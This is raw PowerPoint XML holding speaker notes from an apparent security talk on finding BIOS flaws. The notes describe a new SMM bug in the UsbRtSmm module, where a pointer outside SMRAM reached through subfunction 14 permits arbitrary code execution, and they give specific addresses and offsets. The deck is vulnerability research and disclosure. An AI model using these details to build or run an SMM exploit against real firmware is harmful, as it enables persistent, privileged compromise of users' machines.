        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Shape 50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Shape 283"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>On this slide you can see a today's agenda. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>The goal of this talk is to describe the BIOS vulnerability discovering process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> recently discovered tools such as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Intel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> DCI technology.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Shape 284"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Shape 28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Shape 513"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Do you remeber the AptioCalypsis bugs? Let’s see how properly they have patched the issues.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="Shape 514"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970600" cy="457500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Shape 51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Shape 522"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>One of the affected SMI handlers is present here. This is the UsbRtSmm module.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Shape 523"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Shape 52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Shape 531"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>We used the ida-efitools plugin to parse the BIOS modules. The analysis showed us the did patch the issue, but we have found another one...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="Shape 532"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="Shape 53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Shape 539"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>DispatchFunction operates with the ptr, the value of which is unknown during static analysis. In addition, there is some structure participating in the logic. Which pointer can be found by computing [16 * [0x40e] + 260]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>The 0x40e memory address (stores segment address of Extended BIOS Data Area) may be easily controlled by a user with kernel level privileges. But there is a subroutine that checks whether the acquired pointer intercepts the SMRAM region, and exits from the handler if the pointer does.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Then it you can see that the first byte of the obtained structure is a number of a called subfunction. The total amount of these subfunctions is equal to 24. The most interesting one among them is the subfunction 14.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Shape 540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Shape 54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 name="Shape 546"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="Shape 547"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>The ptr appeared here as well and it is used to acquire another pointer in relation to it. After that, the acquired pointer is transferred to the subroutine.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="Shape 548"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Shape 54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Shape 555"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Here is “a little something” from the driver developer: the function calls another one to which the pointer refers. The thing is it can send up to 7 arguments! However, is it possible to control the pointer? In subfunc_14, the pointer is computed in relation to ptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Shape 556"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Shape 55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Shape 563"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>The advantages that dynamic analysis grants help to learn the contents of the function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="Shape 564"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Shape 56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Shape 571"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Shape 572"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="573" name="Shape 57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Shape 579"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>So, the driver operates with the pointer that is equal to 0xbcee9000. And this is not the SMM memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>SMRAM covers the range from 0xbd000000 to 0xbd7fffff.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Considering that the driver allows calling pointer stored in volatile memory, there is an opportunity to perform arbitrary code execution in the SMM context.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="Shape 580"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970600" cy="457500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Shape 58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Shape 587"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>t is necessary to determine how to compute the 0xbcee9000 address from an OS. By analyzing xrefs to ptr it possible to find the exact place where these values are assigned.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="Shape 588"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970600" cy="457500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Shape 58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Shape 291"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
